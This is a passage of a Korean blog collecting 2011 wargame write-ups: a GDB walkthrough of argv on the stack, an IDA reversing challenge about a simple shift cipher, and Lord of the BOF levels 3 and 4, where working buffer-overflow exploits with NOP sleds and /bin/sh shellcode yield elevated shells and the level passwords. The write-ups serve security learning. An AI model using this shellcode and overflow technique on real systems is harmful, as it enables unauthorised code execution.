
0x804843f <main+111>: nop

End of assembler dump.

(gdb) [gate@localhost tmp]$ clear

[gate@localhost tmp]$ cat t1.c

#include<stdio.h>

int main(int argc, char *argv[])

{

printf("%s ", argv[0]);

printf("%s ", argv[1]);

printf("%s ", argv[2]);

printf("%s\n", argv[3]);

return 0;

}

[gate@localhost tmp]$ ./t1 1 2 3 4

./t1 1 2 3

대부분의 분들이 아시겠지만 모르는분들도 계시고, 복습차로 더해봅니다.

EBP+4 == RET

↓ 4Byte

EBP+8 == Argc == 인자 개수

↓ 4Byte

EBP+12 == Argv[0] == 프로그램 이름 == t1

↓ 4Byte

EBP+16 == Argv[1] == 1

↓ 4Byte

EBP+20 == Argv[2] == 2

Argv[0] Argv[1] Argv[2] == Argc 3

mov A B == B 에 A 의 값을 복사하다, 대입하다, 넣다

[gate@localhost tmp]$ gdb -q t1

(gdb) disas main

Dump of assembler code for function main:

0x80483d0 <main>: push %ebp

0x80483d1 <main+1>: mov %esp,%ebp // 프롤로그

0x80483d3 <main+3>: mov 0xc(%ebp),%eax // EAX 에 (EBP+12) 값 복사 - (EBP+12) == argv[0]

0x80483d6 <main+6>: mov (%eax),%edx // EDX 에 EAX 값 복사

0x80483d8 <main+8>: push %edx // EDX 푸시

0x80483d9 <main+9>: push $0x8048490 // 0x8048490 푸시 - %s

0x80483de <main+14>: call 0x8048308 <printf>

printf("%s ", argv[0]); 호출합니다.

위의 소스를 제대로 분석하셨다면 푸시한 EDX 에는 Argv[0] 이 들어가있는것과

0x8048490 에는 "%s " 가 들어가있다는것을 아실 수 있습니다.

0x80483e3 <main+19>: add $0x8,%esp // ESP+8

0x80483e6 <main+22>: mov 0xc(%ebp),%eax // EAX 에 (EBP+12) 의 값 복사

0x80483e9 <main+25>: add $0x4,%eax // EAX + 4 == 아까 Argv[0] 에서 4를 더해 Argv[1] 이 됩니다.

0x80483ec <main+28>: mov (%eax),%edx // EDX 에 EAX 값을 넣습니다.

0x80483ee <main+30>: push %edx // EDX 를 푸시합니다.

0x80483ef <main+31>: push $0x8048490 // 0x8048490 을 푸시합니다. - 아까와 같은 과정을 거칩니다.

0x80483f4 <main+36>: call 0x8048308 <printf>

// printf("%s ", argv[1]); 굳이 설명하지 않아도 아실겁니다.

0x80483f9 <main+41>: add $0x8,%esp

0x80483fc <main+44>: mov 0xc(%ebp),%eax // EAX 에 (EBP+12) 의 값 복사

0x80483ff <main+47>: add $0x8,%eax // EAX + 8 == 아까 Argv[0] 에서 8을 더해 Argv[2] 가 됩니다.

0x8048402 <main+50>: mov (%eax),%edx

0x8048404 <main+52>: push %edx

0x8048405 <main+53>: push $0x8048490

0x804840a <main+58>: call 0x8048308 <printf>

// printf("%s ", argv[2]);

0x804840f <main+63>: add $0x8,%esp

0x8048412 <main+66>: mov 0xc(%ebp),%eax // EAX 에 (EBP+12) 의 값 복사

0x8048415 <main+69>: add $0xc,%eax // EAX + 12 == 아까 Argv[0] 에서 12을 더해 Argv[3] 가 됩니다.

0x8048418 <main+72>: mov (%eax),%edx

0x804841a <main+74>: push %edx

0x804841b <main+75>: push $0x8048495

0x8048420 <main+80>: call 0x8048308 <printf>

// printf("%s\n", argv[3]);

0x8048425 <main+85>: add $0x8,%esp

0x8048428 <main+88>: xor %eax,%eax

0x804842a <main+90>: jmp 0x8048430 <main+96>

0x804842c <main+92>: lea 0x0(%esi,1),%esi

0x8048430 <main+96>: leave

0x8048431 <main+97>: ret // 에필로그

/* 생략 */

End of assembler dump.

프로그램을 정상적으로 디버깅해보았습니다. 그러면 한번 얻어가는게 있어야하니깐

입력했을때 과연 EDX 에 정상적으로 들어가는지 확인해보겠습니다.

(gdb) b *main+14

Breakpoint 3 at 0x80483de

Argv[0] 을 printf 하는 부분에 브레이크포인터를 걸었습니다.

아까 보셨듯이 Argv[0] 에는 프로그램의 이름이 들어갑니다.

(gdb) r a a a a

The program being debugged has been started already.

Start it from the beginning? (y or n) y

Starting program: /home/gate/xodnr/tmp/t1 a a a a

/bin/bash: /home/orc/.bashrc: Permission denied

Breakpoint 3, 0x80483de in main ()

(gdb) x/s $edx

0xbffffc88: "/home/gate/xodnr/tmp/t1" // Argv[0] 참조

그러면 설명을 생략하고 Argv[1] , Argv[2], Argv[3] 에 모두 브포를 걸고 보여드리겠습니다

(gdb) b *main+36

Breakpoint 9 at 0x80483f4

(gdb) r 1 2 3 4

The program being debugged has been started already.

Start it from the beginning? (y or n) y

Starting program: /home/gate/xodnr/tmp/t1 1 2 3 4

/bin/bash: /home/orc/.bashrc: Permission denied

Breakpoint 9, 0x80483f4 in main ()

(gdb) x/s $edx

0xbffffca0: "1" // Argv[1] 참조

(gdb) b *main+58

Breakpoint 10 at 0x804840a

(gdb) r 1 2 3 4

The program being debugged has been started already.

Start it from the beginning? (y or n) y

Starting program: /home/gate/xodnr/tmp/t1 1 2 3 4

/bin/bash: /home/orc/.bashrc: Permission denied

Breakpoint 10, 0x804840a in main ()

(gdb) x/s $edx

0xbffffca2: "2" // Argv[2] 참조

(gdb) b *main+80

Breakpoint 11 at 0x8048420

(gdb) r 1 2 3 4

The program being debugged has been started already.

Start it from the beginning? (y or n) y

Starting program: /home/gate/xodnr/tmp/t1 1 2 3 4

/bin/bash: /home/orc/.bashrc: Permission denied

Breakpoint 11, 0x8048420 in main ()

(gdb) x/s $edx

0xbffffca4: "3" // Argv[3] 참조

이렇게 GDB 를 이용한 바이너리 분석 문제 1을 끝마치겠습니다.

[IDA-Analysis] Binary Wargames Level1

XoDNr_ 깝태 — Wed, 17 Aug 2011 11:29:17 +0900

안녕하세요, 이 게시판에서는 ELF 파일, 즉 바이너리 파일을 받아 C 언어로 소스화

하면서 모르는것은 알아가면서 필요한 키 값을 찾아가는 문제를 풀어가는 게시판입니다.

파일은 제공되지 않으며 만약 이렇게 분석을 하실 생각이라면 아이다 프로가 필요합니다.

이번 문제풀이의 목표는 본 파일에서 암호화를 하는데 똑같은 방법으로 "Deep into the system" 을 암호화해야 합니다.

단, UTC 2012년 12월12일 12시12분 12초 (24시간기준) 에 프로그램을 실행 했을 때의 암호화된 값을 적어야 한다.

무슨말이냐면 유닉스 시스템 용어로 타임스탬프라고 1970년 1월 1일 00:00:00를 기준으로 경과한 초를 의미하는데

이 점을 이용해 UTC 2012년 12월 12일 12시 12분 12초 에의 타임스탬프 값을 구해 대입하면 기준이 될 수 있다.

아이다 프로로 열은 바이너리 파일을 바로 C 언어로 소스화 시킬것이며 완벽하지 않을 수도 있으니 이해바랍니다 ^^

일단 프로그램을 실행하면

Normal : Sur3x5F The Valueable System Hacking Crew God damn it :)

Encrypted : Xzw8}:K%Ymj%[fqzjfgqj%X~xyjr%Mfhpnsl%Hwj|%Lti%ifrs%ny%?.

다음과 같은 문자열이 뜹니다. 저 평문을 Deep into the system 으로 하여

2012년 12월 12일 12시 12분 12초를 기준으로 암호화를 진행하여 나오는 암호문이 정답입니다.

다음과 같은 함수들이 목록에 있습니다.

sub_8048450 .text 08048450 00000057 R . . . B . .

sub_80484B0 .text 080484B0 00000023 R . . . B . .

sub_80484D4 .text 080484D4 0000010E R . . . B . .

sub_80485E2 .text 080485E2 0000001D R . . . B . .

sub_8048600 .text 08048600 00000005 R . . . B . .

sub_8048610 .text 08048610 0000005A R . . . B . .

sub_804866A .text 0804866A 00000004 R . . . . . .

sub_8048670 .text 08048670 0000002A R . . . B . .

중요해보이거나 직접적으로 포함되어있는 함수만 소스화를 하겠습니다.

int main()

{

unsigned int seed;

char cipher;

int ps;

int sum;

ps = 0;

seed = time(0); //

srand(seed);

sum = rand() % 5;

malloc(30); // 30바이트 임시 공간 생성

write(1, "Normal : ", 9);

puts("Sur3x5F The Valueable System Hacking Crew God damn it :)");

write(1, "Encrypted : ", 12);

while ( aSur3x5fTheValu[v3] )

{

cipher = Encrypted(aSur3x5fTheValu[ps], sum);

// cipher 함수를 호출하며 인자로 평문[0] 과 암호기준, 시드값을 전달합니다.

putchar(cipher);

++v3;

}

return puts(&s); // printf("\n"); 과 같은 역할을 한다.

}

int cipher(unsigned a1, int a2)

{

return a2 + a1 + 2;

}

일단 준비물은 모두 준비하였습니다.

문자열 = Deep into the system

타임스탬프 값 = 1355314332

정식 소스로 짜내겠습니다.

#include<stdio.h>

#include<stdlib.h>

int encrypted(unsigned a1, int a2);

int main()

{

unsigned int seed;

char cipher;

int ps;

int sum;

ps = 0;

seed = 1355314332;

srand(seed);

sum = rand() % 5;

// srand 값으로 하면 계속 실행했을때마다 계속 랜덤되는 값이 나오는게 맞는말이지만

// srand(time(0)) 의 경우이고, srand(고정값) 으로 랜덤을 돌렸을때는 rand() 를 하였을때도 계속 고정된값이 나온다.

malloc(30); // 임시 메모리 공간 30바이트 생성

write(1, "Normal : ", 9);

puts("Deep into the system Encrypted :)");

write(1, "Encrypted : ", 12);

while("Deep into the system"[ps])

{

cipher = encrypted("Deep into the system"[ps], sum); // cipher 함수를 호출하며 인자로 평문[0] 과 암호기준, 시드값을 전달합니다.

putchar(cipher);

++ps;

}

printf("\n");

return 0;

}

int encrypted(unsigned a1, int a2)

{

return a2 + a1 + 2;

}

[gate@localhost xodnr]$ ./seeme

Normal : Deep into the system :)

Encrypted : Ghhs#lqwr#wkh#v|vwhp

정상적으로 정답이 출력되었습니다.

[BOF-Wargames] LOB Load of BOF LEVEL4 (goblin -> orc) 문제풀이

XoDNr_ 깝태 — Wed, 17 Aug 2011 02:10:44 +0900

Goblin -> Orc LOB 문제풀이를 시작하도록 하겠습니다.

[goblin@localhost goblin]$ ls

orc orc.c

[goblin@localhost goblin]$ ./orc

argv error

[goblin@localhost goblin]$ ./orc aa aa aa

stack is still your friend.

[goblin@localhost goblin]$ cat ./orc.c

The Lord of the BOF : The Fellowship of the BOF

- orc

- egghunter

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40]; // Buffer 40바이트 선언

int i;

if(argc < 2){

printf("argv error\n"); // 역시나 전 레벨과 똑같다.

exit(0);

}

// egghunter

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i])); // 환경변수 초기화 - 에그쉘 사용 금지

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n"); // RTL 사용금지

exit(0);

}

strcpy(buffer, argv[1]); // argv[1] 을 buffer 에 복사한다.

printf("%s\n", buffer); // 복사된 buffer 을 출력한다.

}

소스는 매우 길어졌지만 별거 없습니다. 일단 전 레벨과 같이 인자를 3개 이상 넣어줘야만 하며

이번 문제에서는 환경변수를 이용하여 문제를 풀 수 없으며 또 "\bf" 를 다수로 넘겨줘야만 된다.

[goblin@localhost goblin]$ gcc -v

Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs

gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)

역시나 더미는 붙지 않는다.

그렇다면 공격 버퍼는 40바이트가 된다. 한번 메모리 구조를 그려보자

우리에게 필요한건 Buffer 이후의 부분이다.

공격방법은 argv[2] 에 NOP 와 쉘코드를 넣어주고 argv[1] 의 RET 주소에 argv[2] 의 주소를 넣어주는것이다.

페이로드를 구성해보자

"\xbf" * 44 + RET | NOP * 30000 + SHELLCODE

이렇게 공격해줄것이다. 앞에서 bf 를 44개 넣어주는것은 앞에서 말했던 내용이다.

먼저 argv[2] 의 주소를 알아내는 코딩을 하고 공격을 시도해보겠다.

[goblin@localhost xodnr]$ cat orc.c

The Lord of the BOF : The Fellowship of the BOF

- orc

- egghunter

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40];

int i;

if(argc < 2){

printf("argv error\n");

exit(0);

}

// egghunter

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

strcpy(buffer, argv[1]);

printf("0x%x\n", argv[2]); // 추가된 부분이다.

printf("%s\n", buffer);

}

[goblin@localhost goblin]$ ./orc `python -c 'print "\xbf"*44 + "\xaa\xaa\xaa\xbf"'` `python -c 'print "\x90"*30000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

0xbfff872e

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿ªªª¿

Segmentation fault (core dumped)

[goblin@localhost goblin]$ ./orc `python -c 'print "\xbf"*44 + "\x2e\x87\xff\xbf"'` `python -c 'print "\x90"*30000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿.‡ÿ¿

bash$ id

uid=503(goblin) gid=503(goblin) euid=504(orc) egid=504(orc) groups=503(goblin)

bash$ my-pass

euid = 504

cantata

성공적으로 문제를 풀었다.

[BOF-Wargames] LOB Load of BOF LEVEL3 (cobolt -> goblin) 문제풀이

XoDNr_ 깝태 — Tue, 16 Aug 2011 21:47:02 +0900

[cobolt@localhost cobolt]$ ls

goblin goblin.c

[cobolt@localhost cobolt]$ ./goblin

[cobolt@localhost cobolt]$ ./goblin aa aa aa

프로그램을 입력해도 아무 응답이 없네열...

[cobolt@localhost cobolt]$ cat goblin.c

The Lord of the BOF : The Fellowship of the BOF

- goblin

- small buffer + stdin

int main()

{

char buffer[16];

gets(buffer);

printf("%s\n", buffer);

}

확인해보니 아까와 다른 방식입니다. 이번에는 프로그램을 실행하고 입력하는 방식입니다.

이럴때는 스크립트를 넘겨줄때 다음과 같이 넘겨주어야 합니다.

(python -c 'print "\x90"*100';cat)|./attackme

이번에는 환경변수를 이용해 문제를 풀어보도록 하겠습니다. 일단 에그쉘과 에그쉘의 정확한 주소를 알아내는

소스를 짜야됩니다. 그에 대한 내용은 자세히 설명하지 않고 넘어가겠습니다.

일단 에그쉘을 사용해 실행시키고 에그쉘 주소까지 알아냈다면 공격해봅시다.

#include<stdio.h>

int main(void)

{

printf("0x%x\n", getenv("EGG"));

}

이 소스를 이용해 EGG 환경변수의 주소를 알아내었다.

[cobolt@localhost cobolt]$ (python -c 'print "\x90"*20 + "\xd2\xf5\xff\xbf"';cat)|./goblin

Òõÿ¿

*BRAVO!! congratulation~*

*http://blueh4g.org*

uid=502(cobolt) gid=502(cobolt) euid=503(goblin) egid=503(goblin) groups=502(cobolt)

my-pass

euid = 503

hackers proof

성공적으로 정답을 풀었다.